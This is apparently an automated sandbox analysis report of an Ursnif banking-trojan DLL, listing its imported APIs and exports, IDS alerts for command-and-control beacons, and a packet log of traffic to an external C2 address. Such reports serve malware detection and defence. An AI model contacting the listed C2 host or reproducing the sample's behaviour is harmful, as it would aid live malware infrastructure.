GetModuleHandleW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetCurrentThread, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, DecodePointer
USER32.dll	LoadBitmapA, GetWindowLongA, DrawTextA, IsDialogMessageA, GetClassInfoExA, SetWindowTextA, GetIconInfo, SendMessageTimeoutA, DefWindowProcA, CheckDlgButton, ReleaseDC, CallNextHookEx, EnumWindows
GDI32.dll	SetRectRgn, CreateFontA, AbortDoc, EndDoc, GetStockObject, PtVisible, SetAbortProc, GetPixel, CreateRectRgn, SelectClipRgn, GetTextMetricsA, CombineRgn
ole32.dll	CoRegisterClassObject, CoRegisterSurrogate, CoUninitialize, CoInitialize
ADVAPI32.dll	RegOpenKeyExA, OpenServiceA, OpenThreadToken, InitializeSecurityDescriptor, FreeSid, SetSecurityDescriptorDacl, SetEntriesInAclA, RegEnumKeyA, RegCloseKey, StartServiceCtrlDispatcherA, RegOpenKeyA, QueryServiceStatus, RegDeleteKeyA, RegQueryValueExA, AllocateAndInitializeSid, LookupPrivilegeValueA, SetServiceStatus, RegisterServiceCtrlHandlerA, OpenSCManagerA, RegCreateKeyExA, DeleteService, RegSetValueExA, OpenProcessToken, GetTokenInformation
WS2_32.dll	WSACleanup, recv, htonl, htons, recvfrom, getservbyname, ntohs, socket, send, getservbyport, WSAStartup, getprotobynumber, setsockopt
COMDLG32.dll	GetSaveFileNameA, GetOpenFileNameA
COMCTL32.dll	ImageList_DragEnter, ImageList_DragShowNolock, ImageList_ReplaceIcon, ImageList_DragMove

Exports

Name	Ordinal	Address
Seasonthing	1	0x104cc20
Seatforce	2	0x104c3b0
Spaceclose	3	0x104cad0
Time	4	0x104c9d0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/05/21-16:53:08.812255	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49721	80	192.168.2.3	165.232.183.49
07/05/21-16:53:08.812255	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49721	80	192.168.2.3	165.232.183.49
07/05/21-16:53:10.181783	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49723	80	192.168.2.3	165.232.183.49
07/05/21-16:53:13.536216	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49728	80	192.168.2.3	165.232.183.49
07/05/21-16:53:13.536216	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49728	80	192.168.2.3	165.232.183.49
07/05/21-16:53:17.360210	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49733	80	192.168.2.3	165.232.183.49
07/05/21-16:53:17.360210	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49733	80	192.168.2.3	165.232.183.49
07/05/21-16:53:17.531348	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49734	80	192.168.2.3	165.232.183.49
07/05/21-16:53:21.708479	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49736	80	192.168.2.3	165.232.183.49
07/05/21-16:53:21.708479	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49736	80	192.168.2.3	165.232.183.49

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 5, 2021 16:53:08.607325077 CEST	49722	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:08.607326031 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:08.793066025 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:08.793174982 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:08.802515984 CEST	80	49722	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:08.802618027 CEST	49722	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:08.812254906 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.041553974 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.719300032 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.719336987 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.719362974 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.719382048 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.719403982 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.719458103 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.719484091 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.719497919 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.719510078 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.719531059 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.719551086 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.721137047 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.721170902 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.721195936 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.721203089 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.721221924 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.721237898 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.721275091 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.905205965 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.905241966 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.905265093 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.905272007 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.905288935 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.905294895 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.905313969 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.905327082 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.905337095 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.905359030 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.905364037 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.905386925 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.905405045 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.905411959 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.905433893 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.905436993 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.905462027 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.905463934 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.905486107 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.905492067 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.905514956 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.905531883 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.906817913 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.906850100 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.906878948 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.906882048 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.906903028 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:09.906903982 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.906929016 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.906949043 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.982459068 CEST	49723	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:09.982815027 CEST	49724	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.052690983 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.052727938 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.052748919 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.052767992 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.052772045 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.052831888 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.091197968 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.091232061 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.091253042 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.091265917 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.091279030 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.091298103 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.091310978 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.091325045 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.091336966 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.091351986 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.091363907 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.091371059 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.091383934 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.091396093 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.091413975 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.091461897 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.172796965 CEST	80	49723	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.174853086 CEST	80	49724	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.175024033 CEST	49723	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.175987959 CEST	49724	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.181782961 CEST	49723	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.219580889 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.219610929 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.219630003 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.219650984 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.219671011 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.219669104 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.219686031 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.219705105 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.219715118 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.219722986 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.219742060 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.219758034 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.219760895 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.219784975 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.219831944 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.221188068 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.221206903 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.221226931 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.221235991 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.221245050 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.221261978 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.221276999 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.221296072 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.221338987 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.240274906 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.241075039 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.386426926 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.386501074 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.386564016 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.386620045 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.386650085 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.386697054 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.386760950 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.386847973 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.386866093 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.386929035 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.386997938 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.387042999 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.387062073 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.387064934 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.387167931 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.387228966 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.388170004 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.388221979 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.388290882 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.388303041 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.388350010 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.388397932 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.388403893 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.388465881 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.388510942 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.388521910 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.392059088 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.405961990 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.407865047 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.415386915 CEST	80	49723	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.553297043 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.553353071 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.553396940 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.553406954 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.553430080 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.553463936 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.553464890 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.553508997 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.553545952 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.553570986 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.553594112 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.553637981 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.553669930 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.553678989 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.553694010 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.553733110 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.553786039 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.554615021 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.554658890 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.554712057 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.554707050 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.554758072 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.554759026 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.554796934 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.554816008 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.554860115 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.554862022 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.554919004 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.554924011 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.554966927 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.555068016 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.572937965 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.573012114 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.720154047 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.720206022 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.720244884 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.720274925 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.720282078 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.720313072 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.720320940 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.720367908 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.720408916 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.720429897 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.720439911 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.720443964 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.720447063 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.720472097 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.720478058 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.720485926 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.720524073 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.720551968 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.720582008 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.721316099 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.721355915 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.721385956 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.721424103 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.721447945 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.721461058 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.721487999 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.721498013 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.721534967 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.721549988 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.721571922 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.721609116 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.721628904 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.721698999 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.739567041 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.739661932 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.886859894 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.886924982 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.886956930 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.886970043 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.887006998 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.887025118 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.887044907 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.887046099 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.887054920 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.887087107 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.887187004 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.887201071 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.887211084 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.887226105 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.887254000 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.887264013 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.887312889 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.887379885 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.888058901 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.888102055 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.888138056 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.888135910 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.888170004 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.888176918 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.888185024 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.888215065 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.888227940 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.888261080 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.888262987 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.888303041 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.888333082 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.888339043 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.888376951 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.888413906 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.888422012 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.888437986 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.888458967 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.888480902 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.888556004 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:10.906271935 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:10.906352043 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.053796053 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.053853035 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.053899050 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.053905964 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.053946972 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.053952932 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.053985119 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.053992987 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.054003954 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.054029942 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.054055929 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.054075956 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.054089069 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.054117918 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.054138899 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.054155111 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.054189920 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.054204941 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.054555893 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.054595947 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.054630995 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.054651976 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.054661989 CEST	80	49721	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.054687023 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.054725885 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.056163073 CEST	49721	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.091167927 CEST	80	49723	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.091238022 CEST	80	49723	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.091279030 CEST	80	49723	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.091284990 CEST	49723	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.091315985 CEST	80	49723	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.091316938 CEST	49723	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.091355085 CEST	80	49723	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.091367960 CEST	49723	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.091392040 CEST	80	49723	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:11.091409922 CEST	49723	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.091449022 CEST	49723	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:11.093312979 CEST	80	49723	165.232.183.49	192.168.2.3
